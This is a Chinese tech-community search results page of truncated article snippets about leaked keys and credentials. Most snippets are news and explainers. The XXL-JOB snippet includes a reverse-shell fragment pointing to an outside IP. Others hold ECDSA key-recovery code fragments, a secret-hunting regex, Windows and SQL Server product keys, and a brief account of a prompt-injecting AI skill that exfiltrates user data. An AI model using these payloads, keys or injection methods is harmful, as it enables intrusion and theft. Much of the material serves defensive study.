- 综合排序
- 最热优先
- 最新优先
- 来自专栏深度学习与python
LastPass:黑客获得云存储访问密钥,用户信息泄露
通过攻击另一名员工账户,黑客又获得了用于访问和解密基于云存储服务中某些存储卷的凭证和密钥。 目前,LastPass 生产服务在本地数据中心运行,用云来存储备份数据等。驻留要求。 据悉,黑客一旦获得云存储访问密钥和双存储容器解密密钥,就会从备份中复制信息,其中包含基本客户账户信息和相关元数据,包括公司名称、最终用户名称、账单地址、客户访问 LastPass 服务时使用的电子邮件地址 这些加密字段通过 256 位 AES 加密保持 安全,并且只能通过使用 LastPass 的零知识架构从每个用户主密码派生的唯一加密密钥解密。
1.4K10编辑于 2023-03-29 - 来自专栏k-cloud-labs
Cgroup泄露2
from=groupmessage 在上篇cgroup泄露问题1进行了详细的分析,并提供了1.12.4版本(线上版本)的修复方案。
1K00编辑于 2023-03-28 - 来自专栏FreeBuf
超3200个应用程序泄露了 Twitter API 密钥
网络安全公司 CloudSEK 首次发现了这一问题,该公司在检查大型应用程序集合是否存在数据泄漏时,发现了大量应用程序泄露了 Twitter API 密钥。 当攻击者设法得到这些密钥后,就能够以关联的 Twitter 用户身份进行操作,建议大家不要将密钥直接存储在移动应用中,避免攻击者找到并利用它们。 CloudSEK 强调,API 密钥泄漏一般是应用程序开发人员造成的,他们在开发过程中将认证密钥嵌入到 Twitter API 中,但是之后并未删除。 密钥泄露产生那些影响? 值得一提的是,在网络安全公司 CloudSEK 发出警报一个月后,大多数公开暴露 API密钥的应用程序表示没有收到任何通知,也没有解决密钥泄露问题。
1.2K20编辑于 2023-03-30 - 来自专栏FreeBuf
微星固件密钥遭泄露,上百款产品受影响
据Cyber News 5月5日消息,有网络攻击者泄露了著名硬件厂商微星科技的固件映像签名密钥,这些密钥是区分合法和恶意更新的关键组件。 研究人员已经确定了泄露的固件映像签名密钥和英特尔用于 MSI 产品的 BootGuard。 据固件供应链安全平台 Binarly 首席执行官 Alex Matrosov 称,泄露的固件密钥影响了 57 款 微星产品,而泄露的 BootGuard 密钥影响了该公司 166 款产品。 固件镜像签名密钥是硬件安全基础设施的重要组成部分。这些密钥提供了安全信任,即固件是真实的并且没有被除软件开发人员或设备制造商之外的任何人篡改。 密钥的泄露会给用户带来重大风险,攻击者可以访问密钥,将受恶意软件感染的固件映像或固件更新推送为合法的更新。由于固件通常在操作系统启动之前启动,因此恶意代码可能会躲过防病毒或其他安全措施的监视。
39520编辑于 2023-05-12 - 来自专栏#热点技术openclaw
OpenClaw 提示词注入:你的 AI 助理正在偷偷泄露密钥
Cisco的AI安全研究团队测试了一个第三方OpenClawSkill,发现它在用户毫不知情的情况下完成了数据泄露——整个过程对用户完全透明,但破坏已经发生。 Skill本地文件读写网络发送权限网络请求SkillHTTP请求权限系统命令执行权限五、纵深防御效果对比防御层数攻击成功率防御成本适用场景0层(无防御)95%+0绝对不要使用1层(输入隔离)70%低基础防护2层
70120编辑于 2026-03-13 - 来自专栏新智元
Github突遭大规模恶意攻击,大量加密密钥可能泄露!
至于攻击的方式,攻击者会将库中的多种加密信息上传到自己的服务器上,包括安全密钥、AWS访问密钥、加密密钥等。 上传后,攻击者就可以在你的服务器上运行任意代码。 听上去很可怕,有没有?
61720编辑于 2022-08-26 - 来自专栏全栈程序员必看
windows server 2012 r2安装密钥_windows7激活密钥
Windows Server 2012 R2 安装密钥(只适用安装,不支持激活) 标准版 = NB4WH-BBBYV-3MPPC-9RCMV-46XCB 数据中心版 = BH9T4-4N7CW- 67J3M-64J36-WW98Y M98WF-NY2PP-73243-PC8R6-V6B4Y Retail Key MR88Y-BXNRY-VH3DR-349CB-3GK8M retail Key M89WF-NY2PP
18.5K20编辑于 2022-11-04 - 来自专栏网络安全技术点滴分享
ECDSA安全漏洞剖析:从非ce泄露到密钥恢复实战
DSA包含三个核心算法:密钥生成:随机选择私钥x,计算公钥y = gˣ mod p签名生成:选择随机数k(nonce),计算r = (gᵏ mod p) mod q,s = k⁻¹(H(m) + xr) ⁻¹ mod p mod qECDSA的致命弱点非ce重用攻击若两个签名使用相同nonce k:k = (s₁ - s₂)⁻¹(H(m₁) - H(m₂))x = r⁻¹(ks - H(m))部分比特泄露攻击仅泄露 3个nonce比特即可破解160位DSALadderLeak攻击表明:泄露<1比特即可恢复密钥随机数生成器仅4比特偏差也能导致256位ECDSA被攻破实战格攻击(100行Python)import ecdsa s2_inv, 2^128/order, 0], [m1*s1_inv, m2*s2_inv, 0, 2^128]]# LLL格基约简new_matrix = olll.reduction(matrix potential_key = (rns1 - r1sn)⁻¹ * (snm1 - s1mn - s1sn*k_diff) if verify(potential_key): print("密钥恢复成功
69210编辑于 2025-07-26 - 来自专栏Khan安全团队
Chrome插件硬编码API密钥泄露,超2100万用户受影响
近日,Symantec 发布调查报告,揭示Chrome扩展生态中的一项普遍安全隐患:开发者在扩展源代码中硬编码API密钥、令牌和敏感凭证,导致超过2100万用户面临数据滥用、隐私泄露和经济损失的多重风险 多款热门扩展“密钥裸奔” Symantec 表示,这些嵌入在客户端代码中的密钥一经发布即处于完全暴露状态,任何攻击者只需下载并解压扩展程序,即可轻松提取密钥进行滥用。 Symantec 指出多款广受欢迎的 Chrome 扩展程序存在敏感信息泄露问题,以下是主要发现概览: 代码片段显示了硬编码的 Google Analytics 4(GA4)API 密钥 | 图片来源: Watch2Gether(100万+用户) 暴露内容:Tenor GIF搜索API密钥 潜在风险:请求洪泛攻击导致开发者账户被服务方封禁 Trust Wallet(100万+用户) 暴露内容:法币交易 API密钥 潜在风险:可构造虚假的加密货币买卖请求,诱导用户操作 TravelArrow(30万用户) 暴露内容:地理定位API密钥 潜在风险:请求激增,导致服务费用飙升或接口被关闭 密钥泄露:既失数据
62110编辑于 2025-06-08 - 来自专栏Khan安全团队
使用一个正则表达式搜索所有泄露的密钥
authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_ authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_
1.6K20编辑于 2022-05-17 - 来自专栏渗透云笔记
平台某项目-服务器SSH密钥与日志和命令记录泄露
前言 对于特殊的路径,我比较喜欢收集,然后批量扫子域名,来获取到敏感信息,在之前的渗透里面,机缘巧合下,拿到了一次最贵的信息泄露的漏洞。 路径链接如下 /.bashrc 个人配置记录 ? 更有意思的是泄露了站点服务器所有的操作记录 /.bash_history ? 这才是捡到的洞,最后赏金 600 ?
78130发布于 2021-08-13 - 来自专栏全栈程序员必看
SQLServer2008R2密钥「建议收藏」
SQLServer2008 R2 密钥: Developer: PTTFM-X467G-P7RH2-3Q6CG-4DMYB Enterprise: JD8Y6-HQG69-P9H84-XDTPG-34MBB Microsoft SQL Server 2008 R2序列号密钥 开发版32位:MC46H-JQR3C-2JRHY-XYRKY-QWPVM 开发版64位:FTMGC-B2J97-PJ4QG-V84YB-MTXX8 工组版:XQ4CB-VK9P3-4WYYH-4HQX3-K2R6Q WEB版:FP4P7-YKG22-WGRVK-MKGMX-V9MTM 数据中心版32位:PTTFM-X467G-P7RH2-3Q6CG -4DMYB 数据中心版64位:DDT3B-8W62X-P9JD6-8MX7M-HWK38 企业版32位:R88PF-GMCFT-KM2KR-4R7GB-43K4B 企业版64位:GYF3T-H2V88 -GRPPH-HWRJP-QRTYB 标准版32位:CXTFT-74V4Y-9D48T-2DMFW-TX7CY 标准版64位:B68Q6-KK2R7-89WGB-6Q9KR-QHFDW 发布者:全栈程序员栈长
12.1K30编辑于 2022-07-22 GitHub Actions 安全扫描工具集:检测CVE-2025-30066漏洞与密钥泄露
2025-30066 检测与防御本工具集专为应对 CVE-2025-30066 漏洞设计,旨在帮助开发者和安全团队主动扫描 GitHub Actions 工作流中的潜在恶意行为、风险组件以及可能通过日志泄露的密钥 CxGithub2msScan - 工作流日志密钥泄露扫描自动化日志收集:通过 GitHub API 批量获取指定时间范围内(如最近 7 天)的 GitHub Actions 工作流运行记录。 强大的密钥检测引擎:集成 Checkmarx 2ms 工具,对下载的日志文件进行深度扫描,精准识别已泄露的密钥、令牌和密码。 扫描报告输出:清晰输出每个日志文件中发现的密钥数量及详细扫描结果,便于快速定位和响应。 :扫描工作流日志中的密钥泄露扫描指定仓库最近 7 天的日志python CxGithub2msScan.py --owner your-org-or-username --repo your-repo-name
13110编辑于 2026-02-17- 来自专栏一个程序员的修炼之路
Linux Kernel 模块内存泄露查找 (2)
在之前的一篇博文<<Linux Kernel模块内存泄露的一种查找思路>>中,我介绍了一种查找内核内存泄露的一种方法。 首先根据客户描述,如果停止我们产品,则不会出现内存泄露问题。那确定问题和我们产品有关系,但是和用户态程序还是内核模块程序有关系呢?根据客户提供的Kernel Dump查看Slab占用3.6G。 也就是说,如果不是通过脚本模拟出大量的I/O操作,将会有更小的Memory Leak Rate,确实不易发现内存泄露。既然问题确定了,那么结下来就进行Memory Leak分析啦。 二. 在内核模块中会对文件的dentry进行访问,那么如何引起内存泄露的呢? 2天半的时间,功夫不负有心人,终于找到了根本原因! 三.
1.7K30发布于 2021-08-06 - 来自专栏OneMoreThink的专栏
漏洞实战(2):XXL-JOB默认密钥漏洞
2、危害 攻击者可以对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 /dev/tcp/10.58.81.108/4444 0>&1", 4、防御 修改accessToken的默认值,调度中心和执行器的值需保持一致,例如将accessToken修改为cGqJjTqH2VMB2R1 : sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-admin/src/main/resources /application.properties sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-executor-samples xxl-job-executor-samples/xxl-job-executor-sample-springboot/target/xxl-job-executor-sample-springboot-2.4.0.jar 最后再次使用默认密钥进行任意代码执行
1.8K10编辑于 2024-10-15 - 来自专栏JAVA乐园
密钥用法 增强密钥用法 证书类型
密钥用法: 数字签名 Digital Signature 认可签名 Non Repudiation 密钥加密 key Encipherment 数据加密 Data Encipherment 密钥协商 key :认可签名,证书签名,CRL签名 keyUsage=nonRepudiation, keyCertSign,cRLSign (2)代码签名 密钥用法:数字签名 增强密钥用法:代码签名 keyUsage =digitalSignature extendedKeyUsage=codeSigning (3)计算机 密钥用法:数字签名,密钥协商 增强密钥用法:服务器验证,客户端验证 keyUsage= extendedKeyUsage=serverAuth (5)客户端 密钥用法:数字签名,认可签名,密钥加密,数据加密 增强密钥用法:客户端验证 keyUsage=digitalSignature :信任列表签名 keyUsage=digitalSignature extendedKeyUsage=msCTLSign (7)时间戳 密钥用法:数字签名,认可签名,密钥加密,数据加密 增强密钥用法
2.9K30编辑于 2022-06-30 - 来自专栏数安视界
非对称密钥沉思系列(4):密钥交换
密钥交换的概念密钥交换,也有称作密钥协商,这套机制,最主要的作用是用来得到通信双方的临时会话密钥。这里的临时会话密钥,可以理解为对称加密的密钥,只不过他的有效性仅限于一次会话链接,并不是长期有效的。 图片客户端是密钥生成的决定方在基于RSA的密钥交换体系中,总是由客户端来生成密钥。 其实结合《非对称密钥沉思系列(2):聊聊RSA与数字签名》中的内容,我们在做随机密钥的交换时,还可以结合对随机密钥的HMAC等手段,保证随机密钥的不被篡改。这里感兴趣的同学可以自己思考下。 即使长期密钥已经泄露,也不会影响之前的会话密钥的泄露,也就不会暴露之前的会话内容。DH和ECDH算法为了实现前向安全,变种加入了另一个随机变量ephemeral key得到新的算法DHE、ECDHE。 derived_keydef generate_common_parameters() -> DHParameters: parameters = dh.generate_parameters(generator = 2,
8.4K11319编辑于 2023-01-04 - 来自专栏程序那些事
密钥详解
其他密钥分类 上面的四种是按照加密方式和使用用途来分的,其实安装密钥的使用次数可以分为会话密钥和主密钥。 会话密钥是只用在一个会话中的密钥,用完之后就废弃不用了,而主密钥是固定的密钥,一直重复使用的密钥。 另外安装加密对象是内容还是密钥,我们可以分为加密消息的密钥(CEK)和加密密钥的密钥(KEK)。加密消息的密钥很好理解,之前的对称密钥和公钥密钥就是CEK。 而加密密钥的密钥主要是为了减少密钥的保存个数。 密钥的管理 我们主要从下面几个方面来讲解密钥的管理: 生成密钥 生成密钥有两种方式,使用随机数和使用口令。 保存密钥 学过区块链的应该都知道有个纸密钥的东西,实际上就是把密钥写在纸上进行保存。 当密钥太多的话,离线保存密钥也成了一个非常困难的工作。这时候就可以使用到密钥的密钥KEK。将这些密钥加密后保存。
2.8K30发布于 2020-07-08 - 来自专栏全栈程序员必看
windows10产品密钥永久(windows激活密钥)
使用Windows Key Viewer一键轻松查看当前计算机的产品密钥。 查看当前计算机的产品密钥偶尔需要用到,分享给大家。 软件介绍 通过使用Windows Key Viewer,可以轻松确定当前的计算机产品密钥。 在某些情况下,例如在重新安装计算机时,了解产品密钥非常重要。 这就是Windows Key Viewer变得有用的时候,因为可以轻松显示产品密钥。 Windows操作系统存储产品密钥,但是由于此数据已加密,因此无法直接显示它。 Windows密钥查看器可以以其原始格式显示Windows产品密钥。 Windows Key Viewer的优点: 1.以原始格式显示Windows产品密钥 2.将Windows产品密钥复制到剪贴板 3.不需要安装或设置 4.免费使用 5.它支持Windows 7/8/10
7.5K10编辑于 2022-07-28 - 来自专栏全栈程序员必看
WPA2协议新攻击方法(KRACK)—WPA2密钥重安装漏洞
在WPA2协议中,4次握手提供身份认证和会话密钥协商功能,而机密性和完整性是加密协议(比如AES-CCMP协议)来保证的。 2. CCMP:AES的CCMP模式下的加密算法。 结果导致相同的加密密钥和已经使用到的随机数一起被使用。这可能导致wpa2的使用加密协议在加密报文的时候都复用同一个已经使用过的密钥序列。 该攻击并不是完全否定WPA2的四次握手安全属性。实际上,会话密钥依然是安全的,同时AP和客户端的身份认证功能也是安全的。攻击者实际上在握手过程中是无法冒充客户端或都AP。 四次握手的数学证明并没保证密钥会被重安装。四次握手保证了密钥协商是安全的、握手信息无法被篡改。 设备发布补丁前,我需要使用wep协议不? 别傻啦,用wep不如用wpa2.!
1.6K10编辑于 2022-06-28
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号